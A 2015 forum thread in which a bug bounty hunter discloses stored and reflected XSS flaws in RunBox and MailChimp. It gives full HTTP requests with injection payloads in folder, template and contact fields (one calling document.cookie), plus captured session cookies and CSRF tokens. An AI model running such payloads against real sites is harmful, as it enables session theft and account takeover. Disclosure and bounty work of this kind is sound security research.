[PoC] RunBox.com x MailChimp.com - Stored XSS Vulnerabilities (Bug Bounty Hunting)
#1
[PoC] RunBox.com x MailChimp.com - Stored XSS Vulnerabilities (Bug Bounty Hunting)

[Image: runbox_logo_bgwhite.png]
What is RunBox?
Runbox Solutions AS is a company that provides e-mail and web hosting services worldwide. Runbox Solutions was founded in March 2011 and is headquartered in Oslo, where the Runbox services were launched in 2000. Mainly employee-owned, Runbox Solutions works closely with, and is partially owned by, Copyleft Solutions AS.
Source: https://en.wikipedia.org/wiki/Runbox

[Image: rD0mPQd.png]

Very attractive message from the company, but when we take the time to look into the security... Have a good encryption is useless if your secure mail service is not secure at all.

The flaw I want to show you today allowed me to inject malicious JavaScript into victims' browsers. It was possible for me to send a cross-site-scripting attack when forwarding an email, due to the unsecure email body.
This flaw has been fixed in less than a hour, only the smaller vulnerabilities still works but they will be fixed soon.

If a 'secure mailer' is hacked, the malicious javascript can get your mail content, your password, your sessionid... even if your encryption is active while you read the mail, no one can stop a backdoored mail.

Today, there are four basic places where most people’s email can be compromised:

- On your device(s) (as shown on the screenshot below)
- On the networks
- On the server(s)
- On your recipient’s device(s)

On mobile:
[Image: A86w2WK.png]

[Image: UfNKKYq.png]

I compose my new mail who contains the malicious javascript payload. The script will not be visible by the victim because it will be interpreted by the application while the transfer.

[Image: KQAbn57.png]

BAM! XSSED! All your data belong to me. [Image: ninja.gif]
The attacker may also make a stealth code instead of create a cookie alert, in this case you will not see that you have been hacked.

So remember that choose a secure mail service is very important, don't take the risk to have your privacy and your security compromised. Ask about the service you use before

And now this is few cross-site scripting vulnerabilities found on the application:

[Image: hFJUB6c.png]

-Path: https://runbox.com/mail/addresses
-Vulnerable parameter: letter
-Payload: XSS
-Risk: low

PoC:
Code:
+------------------+
| [*]REFLECTED XSS |
+------------------+
https://runbox.com/mail/addresses?letter=%27%22%3E%3C/title%3E%3Cscript%3Ealert%281337%29%3C/script%3E
PROF SCREEN: http://i.imgur.com/hFJUB6c.png
<td class="title" width="20%">Contacts &gt;  '\'\"&gt;<script>alert(1337)</script>' (0)</td>

[Image: LZpvS48.png]

-Path: https://runbox.com/files/fileslist.html
-Vulnerable parameter: new_folder
-Payload: XSS
-Risk: low

PoC:
Code:
+---------------+
| [*]STORED XSS |
+---------------+
POST: https://runbox.com/files/fileslist.html
Host: runbox.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://runbox.com/files/fileslist.html
Cookie: Runbox::AuthCookie_Runbox=854404:1434926232:6afead17cf4aaad9ed0ff7d62695dcd7:takara; mysessid=a10ce2c665e825292981c03ed7254ebb; backend=nfs5014
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 214
POST: fof=0&new_folder=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3B%3E&create=%C2%A0Create%C2%A0&dir=0&drag_move=&execute=&order=&direction=&offset=&search=&winst=1434925685485&fontsize=&theme=_aero&current_folder_id=
PROF SCREEN: http://i.imgur.com/LZpvS48.png

[Image: 56b9f63c6dfd46398d47614f929aec9f.png]

-Path: https://runbox.com/mail/addresses
-Vulnerable parameter: add_url
-Payload: XSS
-Risk: low

PoC:
Code:
POST: https://runbox.com/mail/addresses
Host: runbox.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://runbox.com/mail/addresses
Cookie: Runbox::AuthCookie_Runbox=854404:1434926639:22815a1c297fad39fc7e565828626784:takara; mysessid=a10ce2c665e825292981c03ed7254ebb; backend=nfs5014
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------3434243525898
Content-Length: 2404
POST: -----------------------------3434243525898\r\n
Content-Disposition: form-data; name="new_group"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="delete_contact"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="delete_from_group"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="email_contact"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="save"\r\n
\r\n
Add\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="add_nick"\r\n
\r\n
Daisuke\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="add_first_name"\r\n
\r\n
Dan\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="add_last_name"\r\n
\r\n
test\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="add_email"\r\n
\r\n
test@mail.com\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="add_url"\r\n
\r\n
'"><img src=x onerror=prompt(document.cookie);>\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="add_group"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="group"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="order"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="cts_dir"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="to_group"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="move_contacts"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="og"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="s_field"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="contacts_s_string"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="winst"\r\n
\r\n
1434925685485\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="fontsize"\r\n
\r\n
\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="theme"\r\n
\r\n
_aero\r\n
-----------------------------3434243525898\r\n
Content-Disposition: form-data; name="current_folder_id"\r\n
\r\n
\r\n
-----------------------------3434243525898--\r\n

PROF SCREEN: http://i.prntscr.com/56b9f63c6dfd46398d47614f929aec9f.png

[Image: mailchimp_logo.png]

What is MailChimp?
MailChimp is an email marketing service provider, founded in 2001. It has 7 million users that collectively send over 10 billion emails through the service each month.
It is a web-based application, although data can be downloaded and for some features there is an offline application.
Source: https://en.wikipedia.org/wiki/MailChimp

[Image: e78f0d45599c421a96c08cd8957bcf20.png]

[Image: bf71eca5729c401cbfc3d888838775b0.png]

[Image: j3IsyRS.png]

Complete PoC:
Code:
XSS VULNERABILITIES

1) PATH: https://us11.admin.mailchimp.com/templates/#t:files-list
2) CREATE A NEW FOLDER >> ADD FOLDER
3) PAYLOAD: '"><img src=x onerror=prompt(1337);>

POST: https://us11.admin.mailchimp.com/file/folders/create
Host: us11.admin.mailchimp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://us11.admin.mailchimp.com/templates/
Content-Length: 79
Cookie: _ga=GA1.2.1611991762.1434982544; __utma=35488766.1611991762.1434982544.1434983545.1434983545.1; __utmb=35488766.54.9.1434984312807; __utmc=35488766; __utmz=35488766.1434983545.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=p42p51q8rk8hut7ek79agb68t4; _AVESTA_ENVIRONMENT=prod; _TEST_COOKIE=df6e145530fc8f76670e; PHPSESSDATA=c07aa7e0f596dfe32edbdc68de7ee244918bfe78%3A1434986473%3AeNoNy0EKgzAQBdC7zAmaxMTxZ1V6hm7cBKmDDZQIGYXSxrvr%2BvE%2B65JLynPL6Hy42cEOcZQyp%2Fu%2BvdsEg7%2BiB%2Bm21mkRig90oKdKJZgLr%2BY8M3sXj0NfVaQkzT9pCgYZF8K3t0zxBOYYIJY%3D; AKSB=s=1434984148029&r=https%3A//us11.admin.mailchimp.com/templates/; __utma=126600713.1611991762.1434982544.1434984413.1434984413.1; __utmb=126600713.8.9.1434984495382; __utmc=126600713; __utmz=126600713.1434984413.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
POST: filter=&name=New%20Folder&__csrf_token=6a95f589a4013f913de60b4d7815d5282890aea6

PROOF SCREEN: http://i.prntscr.com/e78f0d45599c421a96c08cd8957bcf20.png

Another XSS

1) PATH: https://us11.admin.mailchimp.com/templates/save-template?id=58781
2) CREATE A TEMPLATE >> RENAME TEMPLATE NAME
3) PAYLOAD: '"><img src=x onerror=prompt(1337);>

POST: https://us11.admin.mailchimp.com/templates/save-template?id=58781
Host: us11.admin.mailchimp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://us11.admin.mailchimp.com/templates/edit?id=58781
Content-Length: 85
Cookie: _ga=GA1.2.1611991762.1434982544; __utma=35488766.1611991762.1434982544.1434983545.1434983545.1; __utmb=35488766.58.9.1434985226172; __utmc=35488766; __utmz=35488766.1434983545.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=p42p51q8rk8hut7ek79agb68t4; _AVESTA_ENVIRONMENT=prod; _TEST_COOKIE=df6e145530fc8f76670e; PHPSESSDATA=9d3951aa388f9680459fea5079d21ccf7412c055%3A1434986690%3AeNoNy0EKgzAQBdC7zAmaxMTxZ1V6hm7cBKmDDZQIGYXSxrvr%2BvE%2B65JLynPL6Hy42cEOcZQyp%2Fu%2BvdsEg7%2BiB%2Bm21mkRig90oKdKJZgLr%2BY8M3sXj0NfVaQkzT9pCgYZF8K3t0zxBOYYIJY%3D; AKSB=s=1434984148029&r=https%3A//us11.admin.mailchimp.com/templates/; __utma=126600713.1611991762.1434982544.1434984413.1434984413.1; __utmb=126600713.8.9.1434984495382; __utmc=126600713; __utmz=126600713.1434984413.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _gat=1; __utmt=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
POST: name='%22%3E%3Ctitle%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(1337)%3B%3E&type=overwrite
PROOF SCREEN: http://i.prntscr.com/bf71eca5729c401cbfc3d888838775b0.png

Another XSS

1) PATH: https://us11.admin.mailchimp.com/campaigns/folders/rename
2) CREATE A FOLDER >> RENAME
3) PAYLOAD: '"><img src=x onerror=prompt(1337);>

POST: https://us11.admin.mailchimp.com/campaigns/folders/rename
Host: us11.admin.mailchimp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://us11.admin.mailchimp.com/campaigns/
Content-Length: 82
Cookie: _ga=GA1.2.1611991762.1434982544; __utma=35488766.1611991762.1434982544.1434983545.1434983545.1; __utmb=35488766.75.9.1434985468499; __utmc=35488766; __utmz=35488766.1434983545.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=p42p51q8rk8hut7ek79agb68t4; _AVESTA_ENVIRONMENT=prod; _TEST_COOKIE=df6e145530fc8f76670e; PHPSESSDATA=8e0c34847f6061abfabfb70911a0439dd3aac6c5%3A1434986961%3AeNoNy0EKgzAQBdC7zAmaxMTxZ1V6hm7cBKmDDZQIGYXSxrvr%2BvE%2B65JLynPL6Hy42cEOcZQyp%2Fu%2BvdsEg7%2BiB%2Bm21mkRig90oKdKJZgLr%2BY8M3sXj0NfVaQkzT9pCgYZF8K3t0zxBOYYIJY%3D; AKSB=s=1434985384865&r=https%3A//us11.admin.mailchimp.com/templates/; __utma=126600713.1611991762.1434982544.1434984413.1434984413.1; __utmb=126600713.8.9.1434984495382; __utmc=126600713; __utmz=126600713.1434984413.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
POST: filter=&id=1905&name='%22%3E&__csrf_token=6a95f589a4013f913de60b4d7815d5282890aea6
PROOF SCREEN: http://i.imgur.com/j3IsyRS.png

Here is a list of trusted mail service:
Code:
https://tutanota.com/
https://help.riseup.net/
https://www.hushmail.com/
https://countermail.com/
https://mail.ru/

Have a nice day! [Image: ninja.gif]
Reply
#2
Interesting PoC! What a coincidence, I was just thinking of setting up mailchimp for greysec through smtp.
Reply
#3
(06-23-2015, 08:36 PM)Insider Wrote: Interesting PoC! What a coincidence, I was just thinking of setting up mailchimp for greysec through smtp.

Thanks
Fortunately I've been there, I saved their life, lol. It was a very dangerous flaw.
They offered me USD 300 , USD 100 for each flaw.
In the case of Mailchimp, I tried to send malicious emails and it didn't work.
Reply
#4
(06-23-2015, 11:35 PM)Daisuke Dan Wrote:
(06-23-2015, 08:36 PM)Insider Wrote: Interesting PoC! What a coincidence, I was just thinking of setting up mailchimp for greysec through smtp.

Thanks
Fortunately I've been there, I saved their life, lol. It was a very dangerous flaw.
They offered me USD 300 , USD 100 for each flaw.
In the case of Mailchimp, I tried to send malicious emails  and it didn't work.

thanks for the article, can you post some link or reference related to xss in e-mail. i want to learn how it works.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [Tutorial] XSS through Exif headers Insider 1 1,700 06-16-2020, 11:51 AM
Last Post: LaZr4us
  POC for XML-PRC ? h3x0r 1 7,200 05-20-2019, 01:11 PM
Last Post: Insider
  bug hunting thunder 1 2,707 05-20-2019, 01:08 PM
Last Post: Insider
  Guide to XSS (Examples included) NO-OP 3 14,351 04-29-2019, 12:44 PM
Last Post: mhiats37